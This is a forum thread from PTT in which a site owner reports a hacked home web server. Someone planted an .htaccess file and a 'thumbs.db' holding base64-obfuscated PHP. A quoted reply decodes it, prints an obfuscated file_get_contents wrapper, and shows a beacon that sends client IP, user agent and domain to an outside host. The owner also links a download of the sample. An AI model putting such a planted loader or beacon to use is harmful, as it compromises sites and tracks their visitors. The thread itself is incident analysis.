※ 引述《mervynW (.)》之銘言： : ※ 引述《kidbaby (幸福的進行式)》之銘言： : : 這陣子感覺網站很慢 : : 研究了一下 : : 發現了 不認識的檔案 .htaccess 聯結了 thumbs.db : : 裡頭竟然不是我想像中的圖片? : : 而是base64加密的密文 : 先解到這邊. 建議你. passwd 全換一換吧 : function evaloPoIEXQacJTquN($s) {return @file_get_contents($s);} : 他老兄要抓你的local file 都沒問題啦. : DB 應該也被趴走了吧 (茶) : 要找這種code最快的就是從 eval replace echo. : cp 2~3次就可以看到他的code了. : eval 拿掉也沒辦法執行 (茶), 所以變無害的 code : 解到最後, 這傢伙還沒那麼壞嘛. : file_get_contents :: : http://cacacacacacacacacaca.ca/in.php? : i=CLIENT_IP : &b=USER_AGENT : &h=DOMAIN_NAME : 最終結果是,知道你網站流量,分析你網站值不值的攻擊 太慘了 ........................... 我有些私密的東西放在這個網域裡面的儲存裝置 (不是在這個server) 慘慘慘 我大概說明一下 我的網站是 中華電信 50m/5m 硬體 i5-2400 + ASRock h67m-itx + 4G*2 ddr3 + Intel SSD x25-m G2 34nm 80G. windows 7 旗艦版 + Appserv v2.5.10 架的 在www目錄下被放置 .htaccess 跟 thumbs.db 兩個檔案 時間是 2011/8/9號上午12:04分 可是我上一次更動上面三個網站的東西 應該都在8/9之前 看樣子不像是掛了什麼模組內藏了這兩個檔案被偷放 所以我完全不了解他什麼時候放的 這台電腦也沒有掛ftp (不過別台有) 他到底是怎麼放的呢.... http://dl.dropbox.com/u/12118398/Thumbs222.zip 我把這兩個檔案放出來 看看有沒有高手能完全解譯他...囧 這下真的囧了......... 真的沒偷抓檔案嗎....@@ 還是偷抓我網芳的檔案....? 那我就完了...= =" -- <囧>" 打擊~ ■ ㄥㄥ --

※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 114.32.247.164 ※ 編輯: kidbaby 來自: 114.32.247.164 (10/04 01:32)